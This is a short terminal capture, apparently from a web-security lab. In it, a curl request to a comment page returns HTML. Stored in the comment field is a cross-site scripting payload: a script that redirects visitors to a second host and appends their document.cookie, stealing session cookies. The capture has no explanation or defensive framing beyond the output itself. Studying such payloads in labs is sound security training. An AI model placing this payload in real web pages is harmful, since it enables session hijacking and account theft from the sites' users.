20 lines
408 B
HTML
20 lines
408 B
HTML
student@xenial64s:~$ curl -k https://192.168.16.1/comment/comment.php?c_id=73
|
|
<!doctype html>
|
|
<head>
|
|
<title>Comment</title>
|
|
</head>
|
|
|
|
<body>
|
|
|
|
<strong>Comment</strong>: <script>location.href="http://192.168.16.3/?" + encodeURI(document.cookie);</script>
|
|
|
|
<br><br><br>Go <a href="/comment">back</a> to read the rest of the comments.<br>
|
|
|
|
Lost? Home is <a href="/index.php">this</a> way.
|
|
|
|
|
|
|
|
|
|
</body>
|
|
</html>
|
|
|